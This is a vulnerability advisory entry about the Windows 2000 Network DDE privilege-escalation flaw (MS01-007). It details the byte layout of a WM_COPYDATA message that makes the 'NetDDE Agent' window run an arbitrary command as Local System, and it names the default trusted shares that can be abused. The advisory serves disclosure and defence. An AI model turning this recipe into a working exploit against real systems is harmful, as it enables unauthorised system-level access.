Title: Microsoft Windows 2000 Network DDE Escalated Privileges Vulnerability
Severity: MODERATE
Description:
The Network DDE (Dynamic Data Exchange) service allows processes to share information across a network. The client and server applications communicate via a channel known as a "trusted share". The record of these shares and their accompanying applications are kept by the Network DDE DSDM (DDE Share Database Manager) service.
The DSDM runs as a service and when it start, WINLOGON creates an IPC "window" in the logged-in user's "desktop" named "NetDDE Agent", and with a window class of "NDDEAgnt", to be used in communications with DDE enabled processes. Only processes in the local machine running in the same "windows station" and "desktop" can communicate via this "window".
This distinction is not significant for workstations and servers. However in terminal servers each user session runs in a separate "window station" and none of them can send requests to this "window". Only the console session can send request to the "window" as it runs in the same "window station" and "desktop".
In previous versions of Windows NT requests to the "window" were handled in the context of the logged-in user. In Windows 2000 requests send to the "window" are handled in the Local System security context, as its done in the WINLOGON process address space.
One of the requests that can be sent to this "window" is one that is likely to be used by the system to start an application when a request is made to a "trusted share" but the application associated with the "trusted share" is not yet running. The application to execute is specified in the request message and is run using the Local System security context. Thus an attacker can start an arbitrary program by sending a request to this "window" with the path and arguments of the application to execute.
The request is sent via a window "WM_COPYDATA" message. The message is sent using the "SendMessage()" function, and is handled by the Client/Server Runtime Subsystem (CSSRS). Usually "window" communications is performed via the "PostMessage()" function. The structure sent to the "window" has as it's first four bytes the magic number 0xDDE1DDE1, followed by the four bytes 0x00000001, followed by the four bytes 0x00000001, followed by the 8 bytes DDE share mode ID 0x0100000009000005, followed by the four bytes 0xCCCCCC, followed by the "trusted share" name in ASCII and null terminated, and followed by the command to execute in ASCII and null terminated.
A number of trusted shared exist by default in Windows 2000. This are "Chat$" which is associated with the Microsoft Chat application, "CLPBK$" which is associated with the Clipbook application, and "Hearts$" which is associated with the Microsoft Hearts application. If no "trusted shares" exist on the system an attacker can easily add new ones using the Network DDE Share Manager application.
Affected Products:
- Avaya DefinityOne Media Servers
- Avaya IP600 Media Servers
- Avaya S3400 Message Application Server
- Avaya S8100 Media Servers
- Citrix MetaFrame 0.0.0
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server SP1
References:
- @stake: NetDDE Message Vulnerability
- Microsoft: Microsoft Security Bulletin (MS01-007)
- Microsoft: Microsoft Security Bulletin (MS01-007): Frequently Asked Questions
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
